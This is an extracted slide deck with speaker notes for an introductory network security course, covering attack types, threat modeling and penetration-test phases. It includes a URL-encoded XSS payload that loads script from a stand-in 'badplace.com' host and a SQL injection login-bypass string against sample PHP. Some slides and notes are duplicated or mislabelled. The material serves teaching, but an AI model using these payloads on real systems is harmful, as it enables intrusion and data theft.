2. • According to the Internet Storm Center (http://isc.sans.org),a computer
connected to the Internet has an average of 5 minutesbefore it falls under some
form of attack.
7. NETWORK SECURITY PRINCIPLE
• Confidentiality: only sender, intended receiver should “understand” message
contents
o sender encrypts message
o receiver decrypts message
• Authentication: sender, receiver want to confirm identity of each other
• Message Integrity: sender, receiver want to ensure message not altered (in
transit, or afterwards) without detection
• Access and Availability: services must be accessible and available to users
9. FRIENDS AND ENEMIES: ALICE, BOB, TRUDY
• well-known in network security world
• Bob, Alice (lovers!) want to communicate “securely”
• Trudy (intruder) may intercept, delete, add messages
secure
sender
secure
receiver
channel data, control
messages
data data
Alice Bob
Trudy
data
10. 8-
Who might Bob, Alice be?
• … well, real-life Bobs and Alices!
• Web browser/server for electronic transactions (e.g., on-line
purchases)
• on-line banking client/server
• DNS servers
• routers exchanging routing table updates
• other examples?
26. BOTNET
• Exploit the system and make it botclient->Make
botnet server aware it has joined botnet->Install Anti-
anti virus module->Listen to botnet server for instruction
27. BUFFER OVERFLOW
A flaw that occurs when more data is written to a block of memory, or
buffer, than the buffer is allocated to hold.
28. ROGUE DHCP SERVER
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create
network problems
29. EAVESDROPPING
• Eavesdropping is secretly listening to the private
conversation of others without their consent, as defined
by Black's Law Dictionary.
• Unencrypted open wifi network
• Tool: Firesheep
30. SOCIAL ENGINEERING ATTACK
• Phishing is a technique of fraudulently obtaining private
information. Typically, the phisher sends an e-mail that
appears to come from a legitimate business—a bank, or
credit card company—requesting "verification" of
information and warning of some dire consequences if it is
not provided.
• Phone phishing uses a rogue IVR system to recreate a
legitimate-sounding copy of a bank or other institution's
IVR system.
• Baiting is like the real-world Trojan Horse that uses physical
media and relies on the curiosity or greed of the victim.
• Shoulder surfing involves observing an employee's private
information over their shoulder. This type of attack is
common in public places such as airports, airplanes or
coffee shops.
31. WORM
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create
network problems
32. ROOTKIT
A rootkit is a stealthy type of software, typically malicious, designed
to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a
computer.
33. MAC FLOODING - ARP
In a typical MAC flooding attack, a switch is fed
many Ethernet frames, each containing different
source MAC addresses, by the attacker. The
intention is to consume the limited memory set
aside in the switch to store the MAC address table.
Tool: dsniff
34. DNS CACHE POISONING
DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain
Name System (DNS) resolver's cache, causing the name
server to return an incorrect IP address, diverting traffic to the
attacker's computer (or any other computer).
35. URL ENCODING OR CANONICALIZATION
Canonicalization is when a resource can be represented in more
than one manner.
Canonicalization of URLs occurs in a similar manner where
http://doman.tld/user/foo.gif and
http://domain.tld/user/bar/../foo.gif would represent the same
image file
Results in XSS and SQL Injection attack.
Cross-Site Scripting
Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];
URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>
cheat sheet
37. MIME HEADER PARSING
• Several Win32 mass mailers send themselves via an email with
a MIME encoded malicious executable with a malformed
header, and the executable will silently execute unbeknownst
to the user.
• This occurs whenever Internet Explorer parses the mail and
thus can happen when simply reading or previewing email.
Thus, email worms can spread themselves without any user
actually executing or detaching a file.
http://www.kb.cert.org/vuls/id/980499
39. REPLAY ATTACK
• A replay attack (also known as playback attack) is a form of network
attack in which a valid data transmission is maliciously or fraudulently
repeated or delayed.
40. KEYLOGGER
• Keystroke logging, often referred to as keylogging or keyboard
capturing, is the action of recording (or logging) the keys struck on a
keyboard
• There are numerous keylogging methods, ranging from hardware
and software-based.
52. APPLICATION AND DATA SECURITY
• Web Application
• OWASP Top 10 -
https://www.owasp.org/index.php/OWASP_Top_Ten_Che
at_Sheet
• Hacking Tools: Instant Source, Wget,WebSleuth
BlackWidow,WindowBomb,Burp,cURL
53. SQL – TABLE NAME USERS
Name Age Email Password City
Ram 35 ram@abc.co
m
ram@123 Bangalore
Krishna 24 Krishna@nec.
com
098kkk Mysore
Parul 20 parul@gmail.
com
Pp234 chennai
Select age from users where name=‘Parul’;
Update users set email=‘ram@gmail.ocm’ where name=Ram;-- This is
comment
INSERT into users values (‘Puja’, 30, ‘puja@gmail.com’,’ppp123’,’Ooty’);
DROP TABLE users;
e.g PHP code
$result = mysql_query(“select * from users where(name=‘$user’ and
password=‘$pass’);”);
Add username as Bina’ OR 1=1);--
$result = mysql_query(“select * from users where(name=‘Bina’ OR 1=1);-- and
password=‘junkvalue’);”);
57. XSS
• Stored XSS
– Bad website->send malicious script to genuine web
server
– Client access genuine web server
– Run malicious script and sends data to attacker
• Reflected XSS attack
• Echoed input
• Prevention: Input validation
59. IMPORTANT KEYWORDS
• Threat Model
• Asset
• Threat
• Attack
• Attacker
• Impact
• Probability
• Mitigation
• Subject
60. IMPORTANT KEYWORDS CONTD…
• Object
• Action
• Intended Action
• Unintended Action
• Trust Boundary
• Subject/Object Matrix
• Actor/Action Matrix
• Data Flow Diagram
• Attack Tree
• IT Audit
61. THREAT MODELING
• Formal method to identify and enumerate risk
• Make informed risk decisions in regards to
– Actions
– Threats
– Mitigation against risk
62. WHAT CAN BE THREAT MODELED?
• Applications/ Software
• Systems
• Policies and Procedure
• Business Processes
• Anything….
63. WHEN TO DO THREAT MODELING
• Should be part of SDL
• Should be Iterative Process
• Whenever changes are made
64. RISK MANAGEMENT
• Risk Identification – incidents, bug reports,
testing
• Risk Enumeration & Classification – impact,
how and when it can occur, nature of risk
• Mitigation identification – cost benefit analysis
• Mitigation testing – Penetration testing, Third
party design review, procedural review and
management signoff, Legal review
65. THREAT MODEL PROCESS OVERVIEW
• Define Use Scenarios
• Define Security Assumptions
• Create/Update data flow diagram
• System Decomposition
• Identify Threats
• Determine Risks
• Plan Mitigations
• Iterate Threat Model
66. THREAT MODEL PROCESS METHODOLOGIES
• Microsoft STRIDE/DREAD
• NSA’s InfoSec Assessment Methodlogy
• CERT’s Octave
69. IAM
• Designed by NSA
• Used by US Federal Government
• Assessment broken into 10 different areas
• Designed to assess the risk of automated
information systems that support infra
• Highly detailed and rigid process
http://csrc.nist.gov/publications/PubsSPs.html#800-30
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
70. OCTAVE
• Originates from Carnegie Mellon University’s
S/W engg institute in collaboration with CERT
• Focusses on Org risk not technical
• OCTAVE for large org and OCTAVE-S for small
org.
http://www.cert.org/octave/
71. MS THREAT MODELING TOOL
• Based on CIA methodology
• Comprehensive attack library
• Contain helpful advanced features
http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518
http://msdn.microsoft.com/en-us/library/ff649779.aspx
73. THREE PRE TEST PHASES
• Footprinting:
– Whois(internic.net), Smartwhois, nslookup
– Check company webpage, contact, location, numbers,
www.archive.org, whatismyip.com
– Employee blogs, Job boards
• Scanning
– Identifying active systems
– Discover open ports and access points
– Fingerprinting the OS
– Uncovering services on ports
Tools-> nmap, ping, traceroute, netcat
74. THREE PRE TEST PHASES CONTD….
• Enumerating
– Identify user accounts
– discover NetBIOS name with Nbtscan
– SNMPutil for SNMP
– Windows DNS query
– Establishing Null session
Tools->
Vulnerability Scanner: Retina, SAINT
Password Crackers: Brutus
79. a %61 backspace %08 : %3A
b %62 tab %09 ; %3B
c %63 linefeed %0A < %3C
d %64 creturn %0D = %3D
e %65 space %20 > %3E
f %66 ! %21 ? %3F
g %67 " %22 @ %40
h %68 # %23 A %41
i %69 $ %24 B %42
j %6A % %25 C %43
k %6B & %26 D %44
l %6C ' %27 E %45
m %6D ( %28 F %46
n %6E ) %29 G %47
o %6F * %2A H %48
p %70 + %2B I %49
q %71 , %2C J %4A
r %72 - %2D K %4B
s %73 . %2E L %4C
t %74 / %2F M %4D
u %75 0 %30 N %4E
v %76 1 %31 O %4F
w %77 2 %32 P %50
x %78 3 %33 Q %51
y %79 4 %34 R %52
z %7A 5 %35 S %53
{ %7B 6 %36 T %54
| %7C 7 %37 U %55
} %7D 8 %38 V %56
~ %7E 9 %39 W %57
X %58
Y %59
Z %5A
[ %5B
%5C
] %5D
^ %5E
_ %5F
` %60
Notas do Editor
A compromised-key attack occurs when the attacker determines the key, which is a secret code or number used to encrypt, decrypt, or validate secret information. This key corresponds to the certificate associated with the server. When the attacker is successful in determining the key, the attacker uses the key to decrypt encrypted data without the knowledge of the sender of the data. There are two sensitive keys in use in public key infrastructure (PKI) that must be considered: the private key that each certificate holder has and the session key that is used after a successful identification and session key exchange by the communicating partners.
A compromised-key attack occurs when the attacker determines the key, which is a secret code or number used to encrypt, decrypt, or validate secret information. This key corresponds to the certificate associated with the server. When the attacker is successful in determining the key, the attacker uses the key to decrypt encrypted data without the knowledge of the sender of the data. There are two sensitive keys in use in public key infrastructure (PKI) that must be considered: the private key that each certificate holder has and the session key that is used after a successful identification and session key exchange by the communicating partners.
The Smurf Attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim'sspoofed source IP are broadcast to a computer network using an IP Broadcast address. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim's computer will be flooded with traffic. This can slow down the victim's computer to the point where it becomes impossible to work on.
In computer networking, a mangled or invalid packet is a packet — especially IP packet — that either lacks order or self-coherence, or contains code aimed to confuse or disrupt computers, firewalls, routers, or any service present on the network.
Their usage is associated with a type of network attack called a denial-of-service (DoS) attack. They aim to destabilize the network and sometimes to reveal its available services – when network operators must restart the disabled ones.[1] Mangled packets can be generated by dedicated software such as nmap or Nessus.
As of 2008, most invalid packets are easily filtered by modern stateful firewalls.
Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial-of-service attacks through automatic rate filtering and WAN Link failover and balancing.[
In computing, a stateful firewall (any firewall that performs stateful packet inspection (SPI) or stateful inspection) is a firewall that keeps track of the state of network connections (such as TCP streams, UDP communication) traveling across it. The firewall is programmed to distinguish legitimate packets for different types of connections. Only packets matching a known active connection will be allowed by the firewall; others will be rejected.
Stateful inspection, also referred to as Dynamic Packet Filtering, is a security feature often included in business networks. Check Point Software introduced stateful inspection in the use of its FireWall-1 in 1994.[1][2]
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Filtering
Increasing Backlog
Reducing SYN-RECEIVED Timer
Recycling the Oldest Half-Open TCP
SYN Cache
SYN cookies
Hybrid Approaches
Firewalls and Proxies
By late 2007 Comcast began using forged TCP resets to cripple peer-to-peer and certain groupware applications on their customers' computers.[4][5] This started a controversy, which was followed by the creation of the Network Neutrality Squad (NNSquad) by Lauren Weinstein, Vint Cerf, David Farber, Craig Newmark and other well-known founders of and champions of openness on the Internet.[6] In 2008 the NNSquad released the NNSquad Network Measurement Agent, a Windows software program written by John Bartas, which could detect Comcast's forged TCP resets and distinguish them from real endpoint-generated resets. The technology to detect the resets was developed from the earlier Open-source "Buster" software which used forged resets to block malware and ads in web pages.
sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will:
Check for the application listening at that port;
See that no application listens at that port;
Reply with an ICMP Destination Unreachable packet.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A rogue DHCP server is a DHCP server on a network which is not under the administrative control of the network staff. It is a network device such as a modem or arouter connected to the network by a user who may be either unaware of the consequences of their actions or may be knowingly using it for network attacks such asman in the middle. Some kind of computer viruses or malicious software have been found to set up a rogue DHCP, especially for those classified in the "Rootkit" category.
A network tap is a hardware device which provides a way to access the data flowing across a computer network. In many cases, it is desirable for a third party to monitor the traffic between two points in the network. If the network between points A and B consists of a physical cable, a "network tap" may be the best way to accomplish this monitoring. The network tap has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic through unimpeded, but also copies that same data to its monitor port, enabling a third party to listen.
MIME types are defined by a Content-Type header. In addition to the associated application, each type
has a variety of associated settings including the icon, whether to show the extension, and whether to
automatically pass the file to the associated application when the file is being downloaded.
When receiving an HTML email with Microsoft Outlook and some other email clients, code within Internet
Explorer actually renders the e-mail. If the e-mail contains a MIME embedded file, Internet Explorer
would parse the email and attempt to handle the embedded MIME file. Vulnerable versions of Internet
Explorer would check whether the application should automatically be opened (passed to the associated
application without prompting) by examining the Content-Type header. For example, audio/x-wav files
are automatically passed to Windows Media Player for playing.
However, a bug exists in vulnerable versions of Internet Explorer where files are passed to the incorrect
application. For example a MIME header may appear as:
A network tap is a hardware device which provides a way to access the data flowing across a computer network. In many cases, it is desirable for a third party to monitor the traffic between two points in the network. If the network between points A and B consists of a physical cable, a "network tap" may be the best way to accomplish this monitoring. The network tap has (at least) three ports: an A port, a B port, and a monitor port. A tap inserted between A and B passes all traffic through unimpeded, but also copies that same data to its monitor port, enabling a third party to listen.
Many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message. They are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host. IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middle attacks against hosts on a computer network. Spoofing attacks which take advantage of TCP/IP suite protocols may be mitigated with the use of firewalls capable of deep packet inspection or by taking measures to verify the identity of the sender or recipient of a message.
Many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message. They are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host. IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middle attacks against hosts on a computer network. Spoofing attacks which take advantage of TCP/IP suite protocols may be mitigated with the use of firewalls capable of deep packet inspection or by taking measures to verify the identity of the sender or recipient of a message.
The Trojan horse possesses the typical abilities such as opening up backdoor, stealing information, modifying some drivers and lurking deep in a target system as well as the ability to propagate, attack and make use of web browser techniques.
The Trojan horse possesses the typical abilities such as opening up backdoor, stealing information, modifying some drivers and lurking deep in a target system as well as the ability to propagate, attack and make use of web browser techniques.
Ss: format type i.e string and string
Threat Model: A systemetic examination of a system or processes to determine potential risk to assets
Asset: money, goodwill
Threat: Undesired action or outcome against an asset
Attack: Specific action taken by attacker to realize the threat
Impact: the costs either direct or indirect to an organization
Subject-known as user or actor – unique user type within a system
Object: An item of interest same as asset
Action: Activity done by subject
Mitigation testing should be performed by other people or organization that the one did mitigation
Use scenarios: Intendend and unintended actionnto be determined, need to know everything which system is supposed to do or allow, external dependencies
Use scenarios: Intendend and unintended actionnto be determined, need to know everything which system is supposed to do or allow, external dependencies
Spoofing: Impersonate a user or process in an unauthorized manner
Tempering: Alteration of resource without authorization
Repudiation: No proof or records after the fact that can identify the actors and actions involved
Information Disclosure: Unauthorized reading of data or information
Unauthorized prevention of an intended action
Granting greater levels of privilege than is authorized
IF the threat is realized how much damage can be caused. With some no 1 to 10
Reproducibility: How difficult is to reproduce the circumstances in which the threat can be realized(very difficult(1), Moderate difficult(5) and low difficult to produce(10)
Exploitability: What tools and skills are required to realize the threat.
Affected users: How many users will be affected. No users, few users and all users
Discoverability: How difficult is to discover the threat
National Security Agency
Benefits: rigorous, certification available
Drawbacks: Focuses on vulnerabilities
National Security Agency
Benefits: rigorous, certification available
Drawbacks: Focuses on vulnerabilities
National Security Agency
Benefits: rigorous, certification available
Drawbacks: Focuses on vulnerabilities